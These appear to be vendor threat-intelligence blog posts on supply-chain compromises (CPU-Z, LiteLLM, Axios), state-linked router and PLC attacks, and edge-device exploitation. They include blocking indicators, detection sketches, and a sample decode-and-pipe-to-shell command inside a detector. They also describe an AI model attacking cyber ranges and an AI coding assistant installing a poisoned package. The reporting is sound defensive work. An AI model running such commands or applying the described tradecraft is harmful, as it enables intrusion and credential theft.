“Mythos Preview’s success on one cyber range indicates that it is at least capable of autonomously attacking small, weakly defended and vulnerable enterprise systems where access to a network has been gained. However, our ranges have important differences from real-world environments that make them easier targets. They lack security features that are often present, such as active defenders and defensive tooling. There are also no penalties for the model for undertaking actions that would trigger security alerts. This means we cannot say for sure whether Mythos Preview would be able to attack well-defended systems.

In a regime where attackers can direct and provide network access to models to conduct autonomous attacks on poorly defended systems, cybersecurity evaluations must evolve. As capabilities continue to improve, evaluation environments that lack defenses will no longer be challenging enough to discriminate between the capabilities of the most cyber-capable models or assess trends. Our future work will involve evaluating capabilities using ranges simulating hardened and defended environments, including ranges with active monitoring, endpoint detection and real-time incident response. We will also be tracking how AI-enabled vulnerability discovery and penetration testing campaigns perform on real-world systems.”

Stay safe,

The SentinelOne team

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

Securing the Software Supply Chain: How SentinelOne’s AI EDR Autonomously Blocked the CPU-Z Watering Hole Cyber Attack

On April 9, 2026, cpuid.com was actively serving malware through its own official download button. Threat actors had compromised the CPUID domain at the API level and were silently redirecting legitimate download requests to attacker-controlled infrastructure. The attack ran for approximately 19 hours. Users who navigated directly to the official site received a legitimate, properly signed binary with a malicious payload bundled inside it.

That morning, SentinelOne’s behavioral detection flagged an anomaly inside cpuz_x64.exe. The binary was genuine. The digital signature was valid. The download had arrived from the vendor’s own infrastructure. The process chain cpuz_x64.exe began constructing was the tell: it spawned PowerShell, which spawned csc.exe, which spawned cvtres.exe. CPU-Z does not do that.

CPU-Z, HWMonitor, HWMonitor Pro, and PerfMonitor are staples in IT toolkits. The users who downloaded them followed every instruction they’d been given. The trust chain broke above them. The next attack will work the same way.

SentinelOne’s Annual Threat Report identifies exactly this pattern as a systemic shift: “This [shift] extends deeply into the software supply chain, where the identity of a trusted developer becomes the vector of attack.” In late 2025, we observed the GhostAction campaign, where a compromised GitHub maintainer account pushed malicious workflows to extract secrets. A concurrent phishing attack against a maintainer of popular NPM packages deployed malicious code capable of intercepting cryptocurrency transactions. In each case, the commit logs and push events appeared legitimate because they originated from accounts with valid write access. The identity was verified. The intent had been subverted. The CPUID incident extends this pattern to software distribution itself: the supplier’s download infrastructure became the delivery channel.

What the Agent Saw

The SentinelOne agent triggered the alert “Penetration framework or shellcode was detected” within the first seconds of execution. The detection came from what the process was doing, with five specific behavioral indicators converging:

  • Anomalous API resolution: The process located system functions through non-standard discovery methods, bypassing the OS loader entirely.
  • Reflective code loading: Executable code was running in memory regions with no corresponding file on disk.
  • Suspicious memory allocation: Read-Write-Execute (RWX) memory permissions were requested, a staging pattern for malicious payloads.
  • Process injection patterns: Execution flow consistent with code being redirected into a secondary process to mask its origin.
  • Heuristic shellcode signatures: Sequential operations characteristic of automated exploitation toolkits preparing an environment for command execution.
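The anomalous process lineage described earlier (cpuz_x64.exe spawning PowerShell, which spawns csc.exe, then cvtres.exe) can be sketched as a simple chain-matching check. A real EDR correlates far more context than this; the sketch only illustrates the lineage-matching idea.

```python
# Sketch of the process-chain check implied by the incident: walk a recorded
# process lineage and flag the cpuz_x64.exe -> powershell.exe -> csc.exe ->
# cvtres.exe run. A production agent correlates many more signals; this only
# illustrates matching the suspicious ancestry.

SUSPECT_CHAIN = ["cpuz_x64.exe", "powershell.exe", "csc.exe", "cvtres.exe"]

def chain_matches(lineage: list[str], pattern: list[str] = SUSPECT_CHAIN) -> bool:
    """True if `pattern` appears as a contiguous ancestor-to-descendant run in `lineage`."""
    lineage = [p.lower() for p in lineage]
    n, m = len(lineage), len(pattern)
    return any(lineage[i:i + m] == pattern for i in range(n - m + 1))

# Example lineage as an agent might reconstruct it from process-start events:
events = ["explorer.exe", "cpuz_x64.exe", "powershell.exe", "csc.exe", "cvtres.exe"]
print(chain_matches(events))  # flags the chain described in the incident
```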

The agent autonomously terminated and quarantined the involved processes before the attack advanced further. The malicious CRYPTBASE.dll, placed in the same directory as the legitimate CPU-Z binary, was loaded by Windows before the real system DLL could be reached, and it never completed its job.

Alert Page

The agent was watching for what the software was trying to do. Behavioral detection is the layer that holds when authorization cannot be trusted, because the behavior reveals intent regardless of what signed the package.

Behavioral Indicator
Process Tree
Event Table

What Was Actually Inside

The trojanized packages were designed to leave no trace. A reflective PE loader decrypted and injected a second-stage DLL using XXTEA encryption and DEFLATE decompression, with no disk writes and no file artifacts. Redundant persistence mechanisms were then installed: a registry Run key, a 68-minute scheduled task with a 20-year duration, and MSBuild project files in AppData\Local engineered to survive reboots and partial remediation.

The 2026 Annual Threat Report describes this persistence design as “masquerading as maintenance”: adversaries blend into the environment by mimicking legitimate system updates and background processes. To a busy defender, a scheduled task with a generic name and a timed execution interval appears entirely routine until you examine what it is executing. STX RAT’s 68-minute task with a 20-year duration operates on exactly this logic.

The process chain visible in EDR logs made the intent clear: cpuz_x64.exe spawned powershell.exe, which spawned csc.exe, then cvtres.exe. CPU-Z does not do that.

The final payload, STX RAT, delivered hidden VNC providing an attacker-controlled desktop session invisible to the user, keyboard and mouse injection, browser credential theft across Chrome, Firefox, Edge, and Brave, Windows Vault extraction, cryptocurrency wallet access, and a reverse proxy for follow-on payload delivery. C2 communication ran over a custom encrypted protocol using DNS-over-HTTPS to 1.1.1.1 to bypass DNS monitoring.

A reflective payload executing entirely in memory, inside a signed process, with no disk writes, compresses the detection window to milliseconds. Autonomous response is the only response fast enough.

The Attacker’s Critical Mistake

Kaspersky’s analysis linked the CPUID samples to a March 2026 campaign targeting FileZilla users within hours, and the connection required no advanced forensics. The attacker reused the identical C2 infrastructure and deployed the unmodified STX RAT payload, the same one eSentire’s Threat Response Unit had already fingerprinted and published YARA rules for after the FileZilla campaign.

Those rules detected the CPUID variant without modification.

The actor invested time compromising CPUID’s download API and did nothing to retool after being publicly fingerprinted. The C2 domain, the backend server, the payload: all identical across campaigns. The same backend server had been operating since at least July 2025. Per Kaspersky’s own assessment, the C2 reuse was the gravest mistake of the operation. A more disciplined actor burns infrastructure between campaigns. This one did not, and defenders had working detection before most victims knew an attack had occurred.

What the Attack Was Really For

The 150+ confirmed victims span retail, manufacturing, consulting, telecommunications, and agriculture. The count is almost certainly low: CPUID’s tools have tens of millions of users globally, and the portable ZIP variant of CPU-Z commonly runs on production systems in environments that block installer-based software.

Victim count is secondary to victim profile. CPU-Z users skew toward IT professionals: system administrators, developers, security engineers, the people with domain admin rights, production access, and infrastructure keys. One compromised sysadmin carries a fundamentally different blast radius than one compromised user.

The operational pattern points to an initial access broker. The goal was to sell persistent, hidden access. Someone else would do the extracting.

For organizations where an infection occurred, two questions need answers. What did the attacker do during the window they had access, especially if that machine belonged to a privileged user? And what happens over the next 60-90 days, when whoever purchased that access decides to activate it? Ransomware affiliates who buy IAB access typically move within that window. Cleaning the machine closes one exposure. Monitoring for lateral movement, credential reuse, and unusual authentication in the weeks following remediation closes the other.

What Defenders Should Do Now

For practitioners

The indicators are specific and actionable.

  • Check your fleet for CRYPTBASE.dll in any directory other than C:\Windows\System32.
  • Look for the process chain cpuz_x64.exe or any CPUID application spawning PowerShell.
  • Block supp0v3[.]com and 147.45.178.61 at DNS and firewall layers.
  • At the network layer, watch for DNS-over-HTTPS queries to 1.1.1.1/dns-query resolving welcome.supp0v3.com; STX RAT specifically uses DoH to bypass DNS monitoring, and any endpoint generating this pattern is a high-confidence indicator.
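The first indicator above can be turned into a simple fleet-sweep check. The sketch below classifies candidate paths; it assumes the indicator as stated (CRYPTBASE.dll belongs in the Windows system directories, and on 64-bit Windows the 32-bit copy also legitimately lives in SysWOW64), and real sweeps would of course enumerate paths from endpoint inventory rather than hardcoded examples.

```python
# Fleet-sweep sketch for the CRYPTBASE.dll indicator: the DLL is legitimate in
# the Windows system directories; anywhere else it is a likely DLL
# search-order hijack. On 64-bit Windows, SysWOW64 holds the legitimate
# 32-bit copy, so both locations are treated as expected here.

from pathlib import PureWindowsPath

ALLOWED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def cryptbase_is_suspicious(path: str) -> bool:
    """True if this path is a CRYPTBASE.dll outside the expected system directories."""
    p = PureWindowsPath(path)
    if p.name.lower() != "cryptbase.dll":
        return False  # not the DLL we are hunting
    return str(p.parent).lower() not in ALLOWED_DIRS

print(cryptbase_is_suspicious(r"C:\Windows\System32\cryptbase.dll"))  # expected copy
print(cryptbase_is_suspicious(r"C:\Tools\cpu-z\CRYPTBASE.dll"))       # hijack candidate
```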

If you find an infected machine, remediate all four persistence mechanisms explicitly: the registry Run key, the scheduled task, any MSBuild .proj files in AppData\Local, and PowerShell profile autoruns. The malware installs redundant footholds specifically because partial cleanup leaves it alive.

For security leaders

The harder conversation is about supply chain trust. Your users followed every rule they were given. They downloaded from the official website. They trusted a vendor they had used for years. That vendor’s infrastructure failed them. Behavioral detection, security that watches what software does rather than where it came from, is the layer that caught this.

The business case is specific. When an initial access broker sells a foothold obtained this way, the buyer typically activates within 60-90 days. With average ransomware recovery costs exceeding $4 million per incident, even a single privileged endpoint sold through an IAB represents material, quantifiable exposure. The organizations that already had 24/7 autonomous behavioral monitoring in place closed the window before it opened. The ones that did not are still counting.

The adversary’s tooling was unsophisticated. The OPSEC was poor. The C2 reuse was a gift to defenders. And yet 150+ confirmed victims, and a 19-hour window during which clean, legitimate software was being replaced by a remote access trojan, demonstrate how far attacker leverage has extended into the software supply chain, and how quickly behavioral detection closes the gap when it acts autonomously, before the attack completes its first stage. The attacker’s poor OPSEC saved defenders this time. The structural failure in the trust model (the assumption that software from a trusted source is safe to run) persists regardless of attacker discipline.

The Structural Problem That Remains

SentinelOne’s latest Annual Threat Report documents GhostAction and the NPM package compromise as supply chain identity attacks through code repositories and package managers. CPUID adds a third layer: the vendor’s distribution infrastructure itself. Across all three cases, access controls validated a legitimate identity. The report frames this plainly: “The identity is verified, but the intent has been subverted, rendering traditional access controls ineffective against the resulting supply chain contamination.”

This shift means authorization, the cornerstone of traditional software trust, is no longer a sufficient security boundary. When the distribution channel becomes the failure point, verification has to move from the point of origin to the point of execution.

In the CPUID case, users followed every rule. They downloaded from the official vendor website. That vendor’s download API was the failure point, compromised at the infrastructure level for 19 hours, with no visible indication.

SentinelOne’s Behavioral AI engine detects suspicious and malicious patterns in real time, watching what the software does regardless of where it came from.

SentinelOne customers were protected through autonomous behavioral detection at the point of execution. The structural failure in the trust model (the assumption that software from a trusted source is safe to run) is a gap that better user behavior cannot close. Behavioral detection at machine speed is what closes it.

To understand how the Singularity™ Platform identifies threats across your environment, including those arriving through trusted software channels, request a demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 15

The Good | DoJ Disrupts TP-Link Router Network Run by Russian Spy Org

This week, authorities in the U.S. carried out Operation Masquerade, a court-authorized operation to disrupt a DNS hijacking network run by Russia’s GRU Unit 26165 (APT28). The network involved the compromise of thousands of TP-Link small office/home office routers, spread across more than 23 U.S. states.

Since at least 2024, APT28 operators have been exploiting known vulnerabilities in the devices to steal credentials, gain unauthorized access to router management interfaces, and silently rewrite DNS settings so that queries were redirected to GRU-controlled resolvers instead of the users’ normal providers. The actors then applied automated filtering on the hijacked traffic to pick out DNS requests of intelligence interest.

For selected targets, the resolvers returned forged DNS records for specific domains to insert GRU-controlled infrastructure into encrypted sessions. This allowed operators to collect passwords, authentication tokens, emails, and other sensitive data from devices on the same networks as the compromised routers, including users in government, military, and critical infrastructure sectors.
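One way to surface the forged-record behavior described above is to compare answers from the router-assigned resolver against an independent, trusted resolver and flag domains where they diverge. The sketch below shows only the comparison step over hypothetical lookups; a real check would perform live queries and also consider DNSSEC validation, CDN-driven answer variation, and TTL behavior before alerting.

```python
# Cross-resolver comparison sketch for the hijack pattern described above:
# flag domains where the locally assigned resolver returns a different
# address than an independent trusted resolver. The lookups below are
# hypothetical, illustration-only data.

def hijack_candidates(router_answers: dict[str, str],
                      trusted_answers: dict[str, str]) -> list[str]:
    """Domains where the local resolver's answer differs from the trusted resolver's."""
    return sorted(
        domain
        for domain, addr in router_answers.items()
        if domain in trusted_answers and trusted_answers[domain] != addr
    )

local   = {"mail.example.gov": "203.0.113.66", "news.example.com": "198.51.100.7"}
trusted = {"mail.example.gov": "198.51.100.20", "news.example.com": "198.51.100.7"}
print(hijack_candidates(local, trusted))  # only the diverging record is reported
```

Note that legitimate divergence is common (geo-aware CDNs, split-horizon DNS), so in practice this comparison is a triage signal, not a verdict.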

Russian espionage group APT28 compromised MikroTik and TP-Link routers to redirect traffic for certain authentication operations to AitM phishing kits

www.lumen.com/blog-and-new…


— Catalin Cimpanu (@campuscodi.risky.biz) 7 April 2026 at 17:10

Under court supervision, the FBI developed and deployed a series of commands to send to compromised routers. The operation captured evidence of GRU activity and reset the DNS configuration so the devices would obtain legitimate resolvers from their ISPs. It also blocked the original path the actors used for unauthorized access.

According to DOJ, the FBI first tested the command set on the same TP-Link router models and firmware in a controlled environment, with the goal of leaving normal routing functions intact, avoiding access to any user content, and ensuring that owners could reverse the changes via a factory reset or web management interface.

The bureau is now working with U.S. internet service providers to notify customers whose routers fell within the scope of the warrant.

The Bad | Threat Actors Turn to Script Editor to Bypass Apple’s ClickFix Mitigation

SentinelOne researchers have discovered a variant of the ClickFix social engineering trick targeting macOS users that avoids the need for victims to unwittingly copy-paste commands to the Terminal. Apple recently updated the desktop operating system to include a mitigation for Terminal-driven ClickFix attacks, but threat actors have moved quickly to sidestep Apple’s response.

SentinelOne researchers discovered a campaign in which threat actors used a lure purporting to install the popular AI assistant Claude to deliver AMOS malware. The lure leverages the applescript:// URL scheme to launch Script Editor from the user’s browser, with the editor pre-populated with malicious commands. The delivery mechanism offers threat actors a smooth, Terminal-free attack flow that simply asks the user to perform a few clicks, with no copy-paste involved.

Instructions to victims from a malicious web page
Script Editor opens with pre-populated malicious commands

Analysis of the payloads shows the technique is being used to deliver AMOS/Atomic Stealer malware that reaches out to hardcoded C2 infrastructure and attempts to exfiltrate browser data, crypto wallets, and password stores in a single run. SentinelOne customers are protected against AMOS and similar infostealer variants.

Researchers at JAMF later described a similar campaign using a webpage themed to look like an official Apple help page with instructions on how to reclaim disk space. Taken together, these campaigns suggest that Script Editor–driven ClickFix flows are becoming a reusable pattern rather than a one-off trick.

In the recent macOS Tahoe 26.4 update, Apple added a new security feature to warn users when pasting commands into the Terminal under certain conditions. Threat actors had moved towards the Terminal copy-paste method in response to Apple blocking a previous widely-used method of bypassing Gatekeeper via a Control-click override. However, the new Script Editor-based delivery mechanism entirely sidesteps these efforts and continues the long-running cat-and-mouse game between the operating system vendor and malware authors.

The Ugly | Iranian Hackers Target U.S. PLCs in Critical Infrastructure

Iran-affiliated APT actors are actively exploiting internet-facing operational technology (OT) devices, including Rockwell Automation/Allen-Bradley programmable logic controllers (PLCs), across multiple U.S. critical infrastructure sectors.

According to a joint advisory from CISA and other agencies, this activity has led to PLC disruptions, manipulation of data on HMI/SCADA displays, and in some cases operational disruption and financial loss. The authoring agencies assess that these Iranian-affiliated actors are conducting the campaign to cause disruptive effects inside the United States and note an escalation in activity since at least March 2026.

The campaign focuses on CompactLogix and Micro850 PLCs deployed in government services and facilities, water and wastewater systems, as well as the energy sector. Using leased third-party infrastructure together with configuration tools such as Rockwell’s Studio 5000 Logix Designer, the actors establish apparently legitimate connections to exposed PLCs over common OT ports including 44818, 2222, 102, and 502.

Once connected, they deploy Dropbear SSH on victim endpoints to gain remote access over port 22, extract project files such as .ACD ladder logic and configuration, and alter the process data operators see on HMI and SCADA dashboards. The same port-targeting pattern suggests the actors are also probing protocols used by other vendors, including Siemens S7 PLCs.
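Defenders monitoring OT network segments can watch for the access pattern described above: connections from outside internal ranges to common OT/PLC service ports, plus the Dropbear SSH access over port 22. The sketch below flags such flows from simplified (source, destination, port) records; real monitoring would draw on flow telemetry and site-specific address plans rather than the RFC 1918 ranges assumed here.

```python
# Sketch of flagging the access pattern described above: flows from addresses
# outside internal ranges to common OT/PLC ports (EtherNet/IP 44818, CIP 2222,
# Siemens S7 102, Modbus 502) plus port 22 for the Dropbear SSH access noted
# in the advisory. Flow records are simplified (src, dst, port) tuples, and
# "internal" is assumed to mean the RFC 1918 private ranges.

from ipaddress import ip_address, ip_network

OT_PORTS = {44818, 2222, 102, 502, 22}
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def flag_external_ot_flows(flows):
    """Return (src, dst, port) flows that reach OT ports from non-internal sources."""
    def internal(src: str) -> bool:
        addr = ip_address(src)
        return any(addr in net for net in INTERNAL_NETS)
    return [(s, d, p) for s, d, p in flows if p in OT_PORTS and not internal(s)]

flows = [
    ("192.0.2.10",   "10.1.5.20", 44818),  # external host probing EtherNet/IP: flag
    ("10.1.5.2",     "10.1.5.20", 502),    # internal engineering traffic: ignore
    ("198.51.100.9", "10.1.5.21", 22),     # external SSH to an OT endpoint: flag
]
print(flag_external_ot_flows(flows))
```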

Iran-affiliated cyber actors are targeting operational technology devices across US critical infrastructure, including programmable logic controllers (PLCs). These attacks have led to diminished PLC functionality, manipulation of display data and, in some cases, operational…

— FBI Cyber Division (@FBICyberDiv) April 7, 2026

The advisory places this activity in the context of earlier IRGC-linked operations against U.S. industrial control systems. In late 2023, IRGC-affiliated CyberAv3ngers targeted Unitronics PLCs used across multiple water and wastewater facilities, compromising at least 75 devices. The latest wave extends that playbook to a broader set of PLC vendors and sectors, reinforcing that internet-exposed controllers with weak or missing hardening remain a priority target for disruptive state-linked operations.

Edge Decay: How a Failing Perimeter Is Fueling Modern Intrusions

In the first blog of this series, we explored the Identity Paradox and how attackers exploit valid credentials to operate undetected inside enterprise environments. However, identity compromise rarely happens in isolation.

To understand how these attacks begin, we need to look earlier in the intrusion lifecycle at the place many organizations still assume is secure: the edge.

For years, cybersecurity strategy has been built around defending the perimeter to protect the enterprise. Firewalls, VPNs, and secure gateways were designed as the outer boundary of the organization – hardened systems intended to control access and reduce risk. But that model is breaking down. What was once treated as a defensive layer is now a frequent target of modern attacks.

Rather than acting purely as protection, the perimeter increasingly introduces exposure. This shift reflects what can be described as edge decay, a gradual erosion of trust in boundary-based security as attackers focus on the infrastructure that defines it.

The Perimeter Is No Longer a Safe Boundary

The scale of this shift is hard to ignore. Zero-day exploitation increasingly targets edge devices such as firewalls, VPN concentrators, and load balancers. These are not fringe systems; they are foundational components of enterprise connectivity, and the infrastructure that organizations built to protect themselves has become the infrastructure attackers exploit first.

Yet, unlike endpoints or servers, many edge devices still sit outside traditional endpoint visibility and control. Because these appliances typically cannot run EDR agents, defenders are often forced to rely on logs and external monitoring instead. However, logging can be inconsistent, patch cycles are often slow, and in many environments, these devices are treated as stable infrastructure rather than active risk. This combination creates a persistent visibility gap.

Attackers have recognized this gap and are exploiting it at scale. Rather than targeting hardened endpoints, adversaries are shifting their focus to unmanaged and legacy edge infrastructure and the systems that sit at the intersection of trust and exposure.

Weaponization at Machine Speed

One of the most significant accelerators of edge-focused attacks is the rise of automation and AI-assisted exploitation.

Threat actors are no longer relying on manual discovery. Instead, they use automated tooling to scan global IP space, identify exposed devices, and operationalize vulnerabilities at speed. In some cases, exploitation begins within days or even hours of a vulnerability becoming public.

This compression of the attack timeline has important implications for defenders. Traditional patching cycles and risk prioritization models are no longer sufficient when adversaries can move faster than organizations can respond. As a result, edge compromise is increasingly observed as an early step in broader intrusion chains, often preceding identity-based attacks.

Edge Devices as Persistent Beachheads

Adversaries are increasingly prioritizing edge infrastructure because it represents a structural blind spot. Rather than targeting well-defended endpoints, they focus on unmanaged or legacy systems that fall outside standard visibility. Once compromised, these devices become more than just entry points; they provide a stable foothold for continued operations.

Once attackers gain access to a firewall or VPN appliance, that system effectively becomes an internal pivot point rather than a boundary control. From there, adversaries can monitor traffic, capture credentials, and pivot deeper into the network.

Investigations have repeatedly shown how compromised edge devices are used to:

  • Intercept authentication flows and harvest credentials
  • Deploy web shells on internal systems
  • Create unauthorized accounts for persistence
  • Pivot directly into sensitive infrastructure such as virtualization platforms

SentinelOne’s® Annual Threat Report observed a case where attackers leveraged compromised F5 BIG-IP devices to move from the internet-facing edge directly into internal VMware vSphere environments. In another, vulnerabilities in Check Point gateway devices were exploited to gain initial access across dozens of organizations globally.

These incidents reflect a broader pattern where the edge is becoming the attacker’s preferred entry point for lateral movement and identity compromise.

Living Inside the Infrastructure

More advanced campaigns take this concept even further by embedding themselves directly into the firmware of edge devices. The ongoing ArcaneDoor campaign, as noted in the Annual Threat Report, illustrates this evolution. Targeting legacy Cisco Adaptive Security Appliance (ASA) devices, attackers chained multiple zero-day vulnerabilities to deploy a firmware-level bootkit known as RayInitiator.

This implant is particularly dangerous because it operates below the operating system, allowing it to survive reboots and software updates. Alongside it, attackers deployed LINE VIPER, an in-memory payload capable of capturing authentication traffic and suppressing logging activity to evade detection. In effect, the device itself becomes both the attack platform and the concealment mechanism. When logging is suppressed and monitoring is absent, defenders lose visibility into the intrusion entirely.

The Rise of Untraceable Relay Networks

Compromised edge devices are not just used for internal access; they are also being repurposed as part of global attack infrastructure. State-sponsored actors have begun building Operational Relay Box (ORB) networks from compromised routers and firewalls. These networks allow attackers to route malicious traffic through legitimate but hijacked infrastructure, obscuring the true origin of their operations.

Clusters such as PurpleHaze and activity linked to groups like APT15 and Hafnium demonstrate how these relay networks are used to dynamically rotate attack paths, making attribution more difficult. As a result, malicious traffic can appear to originate from trusted enterprise systems, complicating both detection and response.

This dual use of edge devices as both entry points and relay infrastructure highlights a shift in how adversaries operationalize compromised systems.

Legacy Systems and the Illusion of Patchability

A major contributor to edge decay is the persistence of legacy systems. Many organizations continue to rely on outdated appliances that lack modern security features such as Secure Boot or robust integrity verification. These systems are often considered “patchable,” but in practice, they represent long-term operational risk that is difficult to fully mitigate.

Firmware updates can be disruptive, and vendor support may be inconsistent. In many cases, organizations are hesitant to modify systems that underpin critical connectivity. The result is a growing population of edge devices that remain exposed long after vulnerabilities are discovered. In some environments, this problem is compounded by visibility gaps. Devices running unsupported operating systems or incompatible software cannot host modern security tooling, leaving them effectively unmonitored. These “legacy ghosts” become ideal targets for attackers because they are stable, trusted, and largely invisible.

The Identity Connection

Edge compromise does not exist in isolation. It is deeply connected to identity-based attacks. Once an attacker controls a gateway or VPN appliance, they gain access to authentication flows, session data, and credential material. This allows them to pivot directly into identity infrastructure, bypassing traditional defenses.

In many intrusions, edge compromise becomes the first step toward identity abuse. This creates a direct connection between edge exposure and the challenges described in the Identity Paradox. Attackers do not need to break authentication if they can intercept it. By observing or capturing identity data in transit, they can operate using valid artifacts without triggering traditional controls.

Conclusion | Securing Edge Infrastructure from the Vanishing Perimeter

The perimeter isn’t failing; it has already failed. Every unpatched VPN, every legacy firewall running decade-old firmware, every edge device outside your visibility is a door left open and forgotten about. The question isn’t whether attackers will find it. It’s whether you’ll see them when they walk through. Once attackers establish a foothold at the edge, they move quickly to compromise identities, escalate privileges, and expand their reach across the environment. This progression from edge access to identity abuse to full-scale intrusion is becoming the dominant pattern in modern attacks.

In this context, defending the edge means both protecting infrastructure and disrupting the earliest stages of the attack lifecycle. Given how dynamic and often unmanaged edge environments have become, they can no longer be treated as a reliable line of defense on their own.

To defend against adversaries who specialize in exploiting these blind spots, the path forward requires a shift in perspective from device-level alerts to attack lifecycle visibility, and from assumed integrity to continuous validation.

SentinelOne's Annual Threat Report
A defender’s guide to the real-world tactics adversaries are using today to abuse identity, exploit infrastructure gaps, and weaponize automation.

Third-Party Trademark Disclaimer

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good, the Bad and the Ugly in Cybersecurity – Week 14

The Good | SentinelOne AI EDR Stops LiteLLM Supply Chain Attack in Real Time

This week, SentinelOne demonstrated how autonomous, AI-driven endpoint protection can detect and stop sophisticated supply chain attacks in real time, without human intervention. On the same day the attack was launched, the Singularity Platform identified and blocked a trojanized version of LiteLLM, an increasingly popular proxy for LLM API calls, before it could execute across multiple customer environments. The compromise had occurred only hours earlier, yet the platform prevented execution instantly, without requiring analyst input, signatures, or manual triage.

Catching the Payload in the Act

The attack itself followed a multi-stage, fast-moving pattern designed to evade traditional detection and manual workflows. Originating from a compromised security tool, attackers obtained PyPI credentials to publish malicious LiteLLM versions that deployed a cross-platform payload. In one case, SentinelOne observed an AI coding assistant with unrestricted permissions unknowingly installing the infected package, highlighting a new and largely ungoverned attack surface.

Once triggered, the malware attempted to execute obfuscated Python code, deploy a data stealer, establish persistence, move laterally into Kubernetes clusters, and exfiltrate encrypted data. SentinelOne’s behavioral AI detected the malicious activity at runtime, specifically identifying suspicious execution patterns like base64-decoded payloads, and terminated the process chain in under 44 seconds while preserving full forensic visibility.
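As an illustration of the kind of behavioral signal described here (a sketch, not SentinelOne's actual detection logic), a minimal pattern-matcher can flag command lines that decode base64 and immediately execute the result:

```python
import re

# Illustrative sketch: flag process command lines that decode base64 and
# immediately execute the output, a pattern common to staged payloads.
# The patterns and sample events below are invented for illustration.
SUSPICIOUS = [
    re.compile(r"base64\s+(-d|--decode).*\|\s*(sh|bash|python)"),  # shell decode-and-pipe
    re.compile(r"exec\s*\(\s*.*b64decode"),                        # Python exec of decoded bytes
]

def is_suspicious(cmdline: str) -> bool:
    """Return True if any decode-and-execute pattern matches the command line."""
    return any(p.search(cmdline) for p in SUSPICIOUS)

events = [
    "python -c \"exec(__import__('base64').b64decode('aW1wb3J0IG9zCg=='))\"",
    "echo aGVsbG8= | base64 -d | sh",
    "tar -czf backup.tar.gz /var/www",
]
flags = [is_suspicious(e) for e in events]
print(flags)  # [True, True, False]
```

Real behavioral engines correlate far richer runtime context than command-line strings, but the principle is the same: the detection keys on what the process does, not on which package delivered it.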

Critically, detection did not depend on knowing the compromised package. Instead, it relied on observing behavior across processes, allowing the platform to stop the attack regardless of how it entered the environment – whether via a developer, CI/CD pipeline, or autonomous agent.

This incident underscores a growing trend: AI-driven attacks are operating at speeds that outpace human response. Effective defense now requires autonomous, behavior-based systems capable of acting instantly, closing the gap between detection and compromise before damage can occur.

The Bad | Attackers Compromise Axios to Deliver Cross-Platform RAT via Poisoned npm Releases

The JavaScript HTTP client Axios suffered a major supply chain attack after malicious versions of its npm package introduced a hidden dependency that deploys a cross-platform remote access trojan (RAT). Specifically, Axios versions 1.14.1 and 0.30.4 were found to include a rogue package called “plain-crypto-js@4.2.1,” inserted using stolen npm credentials that belonged to a core maintainer. This allowed attackers to bypass normal CI/CD safeguards and publish poisoned releases directly to npm.

Source: Socket

The malicious dependency exists solely to execute a post-install script that downloads and runs platform-specific malware on macOS, Windows, and Linux systems. Once executed, the malware connects to a command and control (C2) server, retrieves a second-stage payload, and then deletes itself while restoring clean-looking package files to evade detection. Notably, no malicious code exists within Axios itself, making the attack harder to detect through traditional code review.

The operation was highly coordinated, with staged payloads prepared in advance and both affected Axios branches compromised within minutes. Each platform-specific variant – C++ for macOS, PowerShell for Windows, and Python for Linux – shares the same functionality, enabling system reconnaissance, command execution, and data exfiltration. While macOS and Linux variants lack persistence, the Windows version establishes ongoing access via registry modifications.

Researchers believe the attacker leveraged a long-lived npm access token to gain control of the maintainer account. There are also indications linking the malware to previously observed tooling associated with a North Korean threat group known as UNC1069.

Users are strongly advised to downgrade Axios immediately to versions 1.14.0 or 0.30.3, remove the malicious dependency, check for indicators of compromise, and rotate all credentials if exposure is suspected.
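For projects that cannot immediately audit every transitive dependency, one way to enforce the safe version is an `overrides` entry in package.json (supported since npm 8.3). The version below is taken from the advisory above:

```json
{
  "overrides": {
    "axios": "1.14.0"
  }
}
```

Reinstalling after the change regenerates the dependency tree with the pinned version; teams should still verify the lockfile contains no reference to the rogue package.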

The Ugly | High-Severity Chrome Zero-Day in Dawn Component Allows Remote Code Execution

Google has issued security updates for its Chrome browser to address 21 vulnerabilities, including a high-severity zero-day flaw, tracked as CVE-2026-5281, that is actively being exploited in the wild. The vulnerability stems from a use-after-free (UAF) bug in Dawn, an open-source implementation of the WebGPU standard used by Chromium. If successfully exploited, it allows attackers who have already compromised the browser’s renderer process to execute arbitrary code via a specially crafted HTML page.

While Google has confirmed active exploitation, it has withheld technical details and attribution to limit further abuse until more users apply the patch. This zero-day is the latest in a series of actively exploited Chrome flaws addressed in 2026 so far, bringing the total to four for this year alone. Previous issues included vulnerabilities in Chrome’s CSS component, Skia graphics library, and V8 JavaScript engine.

The Dawn flaw could lead to browser crashes, memory corruption, or other erratic behavior, underscoring the risks posed by modern browser attack surfaces. To date, Google has released fixes in Chrome version 146.0.7680.177/178 for Windows and macOS, and 146.0.7680.177 for Linux, now available through the Stable Desktop channel.

To protect against the flaw, users should update Chrome immediately by navigating to the browser’s settings and relaunching after installation. Other Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are also expected to roll out patches and should be updated promptly. CISA has added the flaw to its KEV catalog and mandated that FCEB agencies apply the patch by April 15, 2026 to protect their networks from attack. This latest incident highlights the ongoing targeting of web browsers by threat actors and reinforces the importance of timely patching to mitigate exploitation risks.

The Identity Paradox: The Hidden Risks in Your Valid Credentials

For decades, attackers have favored one intrusion method over all others: compromise the identity. Long before ransomware crews industrialized extortion and modern malware ecosystems matured, adversaries understood a simple truth. If you can access a legitimate account, you can bypass most security controls and operate inside a network with the same privileges as the user who owns it. That strategy has not changed. What has changed is the scale and complexity of the identity surface attackers can exploit.

Modern enterprises no longer operate around a single directory and a handful of user accounts. Instead, organizations rely on sprawling webs of identities that span SaaS platforms, cloud infrastructure, APIs, service accounts, and increasingly autonomous AI agents. A single employee account may now provide access to dozens of interconnected services, while non-human identities quietly power automation behind the scenes.

